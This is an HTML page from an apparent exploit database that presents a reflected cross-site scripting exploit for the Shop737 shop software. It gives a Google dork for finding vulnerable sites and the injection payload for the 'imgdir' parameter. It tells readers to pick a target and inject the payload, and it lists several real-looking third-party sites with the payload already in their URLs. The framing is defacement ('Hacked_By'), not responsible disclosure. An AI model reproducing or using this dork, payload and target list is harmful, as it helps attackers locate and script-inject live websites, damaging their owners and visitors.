<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-48</title>
    </head>
    <body>
        <center>
                <a  href="https://mr-msa.xyz/guexdb/exploits/exploit-48" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
            ########################################################
# Exploit Title: Shop737/Cross Site Scripting(XSS)
########################################################
# Google Dork: inurl:&quot;poto&quot; intext:&quot;powered by Shop737&quot;
# Date: [14/11/2015]
# Exploit Author: Guardiran Security Team =&gt;DeMoN
# Vendor Homepage: [http://www.shop737.com/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DISCRIPTION: Hello Guys.
# That sites Have XSS Or Cross Site Scripting Bug.
# Please Enter Dork In Google And Open Your Target.
# Then add This Script
# [&quot;&gt;&lt;marquee&gt;&lt;h1&gt;Hacked_By_DeMoN_guardiran.org&lt;/h1&gt;&lt;/marquee&gt;]
# In Target after Yhis Section
# [index.php?imgdir=]
# Then You See That Your Script Accomplished.
# GooD LucK
########################################################
# Demo:
# http://www.pasirindo.cXom/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://susu-bubuk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://bestbeachbunXgalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://www.ptskk.cXom/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://www.goholidaXy-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
# http://www.kristalXbohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E
########################################################
# Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T
# We Are Guardiran Security Team
# Discovered By:DeMoN
########################################################        </pre>
    </body>
</html>